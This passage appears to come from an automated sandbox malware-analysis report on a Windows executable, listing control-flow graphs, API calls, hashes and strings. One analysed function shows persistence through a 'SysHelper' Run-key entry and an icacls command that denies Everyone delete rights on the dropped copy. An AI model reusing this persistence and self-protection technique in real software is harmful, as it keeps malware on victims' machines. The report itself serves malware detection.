                                                                                                                                                                                                                                        control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00412090
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00412120
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004235B1
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00423726
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1060 423b4c-423b52 1061 423b61-423b64 call 420c62 1060->1061 1063 423b69-423b6c 1061->1063 1064 423b54-423b5f call 42793d 1063->1064 1065 423b6e-423b71 1063->1065 1064->1061 1068 423b72-423bb2 call 430d21 call 430eca call 430d91 1064->1068 1075 423bb4-423bba call 422587 1068->1075 1076 423bbb-423bbf 1068->1076 1075->1076
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                                        • API String ID: 3074076210-2104205924
                                                                                                                                                                                                                                        • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                                                                                                                                                        • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1079 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                                                                                                                                                          • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                                                                                                                                                          • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                                                        • String ID: i;B
                                                                                                                                                                                                                                        • API String ID: 2427264223-472376889
                                                                                                                                                                                                                                        • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                                                                                                        • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1082 413a90-413ab0 1083 413ab2-413ab8 1082->1083 1084 413af8-413afd 1082->1084 1085 413b00-413b05 call 44f23e 1083->1085 1086 413aba-413ac2 call 423b4c 1083->1086 1090 413b0a-413b0f call 44f1bb 1085->1090 1089 413ac7-413ace 1086->1089 1089->1090 1091 413ad0-413ae0 1089->1091 1093 413ae2-413af1 1091->1093 1094 413af4-413af7 1091->1094 1093->1094 1094->1084
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                                                                                                                                                          • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                                                        • API String ID: 657562460-3788999226
                                                                                                                                                                                                                                        • Opcode ID: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
                                                                                                                                                                                                                                        • Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1096 42fb64-42fb77 call 428520 1099 42fba5-42fbaa call 428565 1096->1099 1100 42fb79-42fb8c call 428af7 1096->1100 1105 42fb99-42fba0 call 42fbab 1100->1105 1106 42fb8e call 42fe47 1100->1106 1105->1099 1109 42fb93 1106->1109 1109->1105
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                                                        • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                                                                                                                          • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1282695788-0
                                                                                                                                                                                                                                        • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                                                        • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1110 427f3d-427f47 call 427e0e 1112 427f4c-427f50 1110->1112
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _doexit.LIBCMT ref: 00427F47
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2158581194-0
                                                                                                                                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                                                        • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1113 412900-41298f call 413a90 MultiByteToWideChar call 418400 1118 412991-412997 call 422587 1113->1118 1119 41299a-41299e 1113->1119 1118->1119 1121 4129a0-4129a8 call 422587 1119->1121 1122 4129ab-4129bd 1119->1122 1121->1122
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-00000400,-00000400), ref: 00412966
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                                                        • Opcode ID: 9923f7c5fc9e2703d867ea7c919ad7633f5c387dee158893e4253aa1c6881e72
